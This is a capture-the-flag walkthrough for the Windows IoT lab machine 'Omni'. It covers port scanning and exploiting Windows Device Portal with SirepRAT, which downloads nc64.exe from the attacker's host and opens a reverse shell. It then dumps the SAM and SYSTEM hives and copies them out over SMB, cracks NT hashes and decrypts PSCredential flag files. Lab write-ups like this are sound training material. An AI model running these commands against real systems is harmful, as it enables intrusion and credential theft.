Omni

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.204 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Jun 16 14:08:04 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.044s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

# Nmap done at Thu Jun 16 14:08:30 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p135,5985,8080,29817,29819,29820 10.10.10.204 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Jun 16 14:09:33 2022 as: nmap -sCV -p135,5985,8080,29817,29819,29820 -oN targeted 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.038s latency).

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.92%I=7%D=6/16%Time=62AB1D85%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 16 14:10:48 2022 -- 1 IP address (1 host up) scanned in 75.72 seconds

If we take a look at the website on port 8080, it will ask for some credentials that we don't have.

Let's enumerate the website with the whatweb tool.

whatweb http://10.10.10.204:8080

http://10.10.10.204:8080 [401 Unauthorized] Cookies[CSRF-Token], Country[RESERVED][ZZ], HTTPServer[Microsoft-HTTPAPI/2.0], IP[10.10.10.204], Microsoft-HTTPAPI[2.0], WWW-Authenticate[Windows Device Portal][Basic]

Exploitation

If we take a look at the result, we'll see the feature Windows Device Portal. At this point, I started looking for any common exploits associated to that feature, and I found this exploit on GitHub. Download it, and install it with the following commands.

git clone https://github.com/SafeBreach-Labs/SirepRAT

cd SirepRat/

pip3 install -r requirements.txt

python3 setup.py install

This tool allow us to execute commands on the victim machine among other things.To get a reverse shell, we'll have to transfer the nc64.exe binary to the Omni machine. First, let's set a simple HTTP server with python on the directory where the nc.exe is located.

python -m http.server 80

Then, execute the SirepRAT tool, so that it will download the nc64.exe binary, and save it in the AppLocker bypass directory C:\Windows\System32\spool\drivers\color\.

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell" --args "/c iwr -uri http://10.10.14.9/nc64.exe -outfile C:\Windows\System32\spool\drivers\color\nc64.exe"

• --return_output set to have the target device return the command output stream.

• -cmd program to execute.

• -args arguments string for the program.

Once we transfer the nc64.exe binary to the victim machine, let's set a netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Now, we'll have to execute the nc.exe binary, so it send us a revere shell.

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c c:\windows\system32\spool\drivers\color\nc64.exe -e cmd 10.10.14.9 4444'

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49671
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>

Privilege Escalation

We'll see that the whoami command doesn't work, but we can still know which user we are by viewing the value of the %username% variable.

echo $username%

omni$

We could also see the users on the system.

net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            app                      DefaultAccount           
DevToolsUser             Guest                    sshd                     
WDAGUtilityAccount       
The command completed with one or more errors.

Now, let's go to the root directory and find the user and root flags recursively.

dir /s user.txt root.txt

• /s enumerate directories and subdirectories.

 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\Data\Users\administrator

07/04/2020  09:48 PM             1,958 root.txt
               1 File(s)          1,958 bytes

 Directory of C:\Data\Users\app

07/04/2020  09:53 PM             1,958 user.txt
               1 File(s)          1,958 bytes

     Total Files Listed:
               2 File(s)          3,916 bytes
               0 Dir(s)     584,065,024 bytes free

If we try to view the flags, we'll see that have a different format.

type C:\Data\Users\administrator\root.txt C:\Data\Users\app\user.txt

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS>
    </Props>
  </Obj>
</Objs>
C:\Data\Users\app\user.txt

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>

In order to view the real flags, we'll have to use PowerShell, and execute the following command.

powershell

(Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential().password

Import-CliXml : Error occurred during a cryptographic operation.
At line:1 char:2
+ (Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential ...
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Import-Clixml], Cryptographic 
   Exception
    + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept 
   ion,Microsoft.PowerShell.Commands.ImportClixmlCommand

But we get an error. Maybe it is because we don't have the right permissions. We'll see that we have SYSTEM privileges, and because of that, we could try to make a copy of the SAM and SYSTEM registries. First, let's create a new folder called temp on the root folder, and then make a copy of those registries.

mkdir C:\temp

cd C:\temp

reg save HKLM\sam sam.backup

reg save HKLM\system system.backup

Now, let's transfer those to our local machine. First, let's set an SMB server with impacket.

impacket-smbserver smbFolder $(pwd) -smb2support

Then, copy the files to the SMB share.

copy sam.backup \10.10.14.9\smbFolder

copy system.backup \10.10.14.9\smbFolder

Once we have those files in our local machine, we could try to extract the hashes of the users with secretsdump.

impacket-secretsdump -system system.backup -sam sam.backup LOCAL

• -system SYSTEM hive to parse.

• -sam SAM hive to parse.

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...

Now, let's put those hashes in the hashes file, and try to break those with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes --format=NT

Using default input encoding: UTF-8
Loaded 6 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Guest)     
mesh5143         (app)     
2g 0:00:00:03 DONE (2022-06-17 00:17) 0.5181g/s 3715Kp/s 3715Kc/s 16317KC/s  _ 09..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

And we get the mesh5143 password. We could try to log in with the user app, and that password in the website.

And we get in.

We'll see that we can run commands as the app user, from the Processes section.

Now, let's set another netcat listener on port 4444 with netcat.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

And now, send a reverse shell again, but this time as the app user.

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49674
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>

At this point, we could see the user flag with the same method as before.

powershell

(Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential().password

7cfd50f6bc34db3204898f1505ad9d70

But, now we can't see the root flag. But there is a file with the same format as the flags on the app home folder called iot-admin.xml. If we try to see it's content, we'll see another password.

powershell

(Import-CliXml -Path C:\data\users\app\iot-admin.xml).GetNetworkCredential().password

_1nt3rn37ofTh1nGz

Now, let's try to log in again in the website, but this time with the administrator user. You'll need to close and open your browser.

And we get in again, but as the administrator user.

Now, let's send another reverse shell, but as the administrator user.

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49674
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>

Finally, as we are the administrator user, all we have to do is reap the harvest and take the root flag with the same method as before.

(Import-CliXml -Path C:\data\users\administrator\root.txt).GetNetworkCredential().password

5dbdce5569e2c4708617c0ce6e9bf11d